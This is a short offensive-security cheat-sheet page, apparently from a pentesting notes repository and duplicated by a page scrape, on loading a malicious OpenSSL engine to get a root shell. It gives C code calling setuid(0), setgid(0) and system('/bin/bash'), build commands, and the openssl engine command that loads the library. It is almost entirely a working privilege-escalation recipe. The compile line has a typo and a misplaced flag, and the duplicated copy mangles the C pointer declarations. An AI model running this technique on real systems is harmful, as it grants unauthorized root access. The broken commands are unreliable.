killchain-compendium/Cryptography/OpenSSL Engine.md

# OpenSSL Engine

* Hook external libs
* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/)

* Most minimal example
```C
#include <openssl/engine.h>

static int bind(ENGINE *e, const char *id)
{
  return 1;
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```

* Shell as root
```C
#include <openssl/engine.h>
#include <unistd.h>

static int bind(ENGINE *e, const char *id)
{
  setuid(0);
  setgid(0);
  system("/bin/bash");
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```

* Compile
```C
gcc -fPIC -o rootshell.o -c rootshell.c
gcc -shared -o rootshell.so -c -lcrytpo rootshell.o
```

* Execute via
```sh
openssl engine -t `pwd`/rootshell.so
```
further restructuring 2022-11-12 23:18:06 +01:00			`# OpenSSL Engine`

			`* Hook external libs`
			`* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/)`

			`* Most minimal example`
			```C
			`#include <openssl/engine.h>`

			`static int bind(ENGINE e, const char id)`
			`{`
			`return 1;`
			`}`

			`IMPLEMENT_DYNAMIC_BIND_FN(bind)`
			`IMPLEMENT_DYNAMIC_CHECK_FN()`
			```

			`* Shell as root`
			```C
			`#include <openssl/engine.h>`
			`#include <unistd.h>`

			`static int bind(ENGINE e, const char id)`
			`{`
			`setuid(0);`
			`setgid(0);`
			`system("/bin/bash");`
			`}`

			`IMPLEMENT_DYNAMIC_BIND_FN(bind)`
			`IMPLEMENT_DYNAMIC_CHECK_FN()`
			```

			`* Compile`
			```C
			`gcc -fPIC -o rootshell.o -c rootshell.c`
			`gcc -shared -o rootshell.so -c -lcrytpo rootshell.o`
			```

			`* Execute via`
			```sh
			openssl engine -t `pwd`/rootshell.so
			```